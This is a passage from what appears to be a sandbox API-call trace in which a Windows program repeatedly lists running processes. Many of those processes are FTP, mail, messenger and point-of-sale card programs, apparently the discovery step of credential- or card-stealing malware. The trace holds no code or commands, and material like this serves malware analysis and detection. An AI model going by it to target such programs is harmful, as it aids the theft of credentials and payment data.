szExeFile="reachinvolve.exe")) returned 1 [0268.891] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0268.893] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0268.895] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0268.896] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0268.898] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0268.899] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0268.901] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0268.902] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0268.951] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0268.952] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0268.954] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0268.955] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0268.957] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0268.958] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0268.960] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0268.961] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0268.963] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0269.028] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0269.030] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0269.032] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0269.035] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0269.037] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0269.040] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0269.042] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0269.045] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0269.047] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0269.050] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0269.052] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0269.055] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0269.057] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0269.081] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0269.084] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0269.086] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0269.088] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0269.094] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0269.096] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0269.099] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0269.101] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0269.103] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0269.105] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0269.110] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0269.113] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0269.115] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0269.117] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0269.119] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0269.192] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0269.195] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0269.197] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0269.200] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0269.205] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0269.208] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0269.210] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0269.212] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0269.219] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0269.221] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0269.223] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0269.225] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0269.227] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0269.229] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0269.285] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0269.287] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0269.289] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0269.291] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0269.297] CloseHandle (hObject=0x9e0) returned 1 [0269.297] Sleep (dwMilliseconds=0x64) [0269.410] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9e0 [0269.426] Process32First (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0269.428] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0269.430] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0269.432] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0269.434] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0269.439] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0269.441] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0269.443] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0269.445] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0269.447] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0269.449] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0269.503] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0269.505] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0269.507] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0269.509] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0269.511] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0269.517] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0269.519] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0269.521] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0269.523] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: 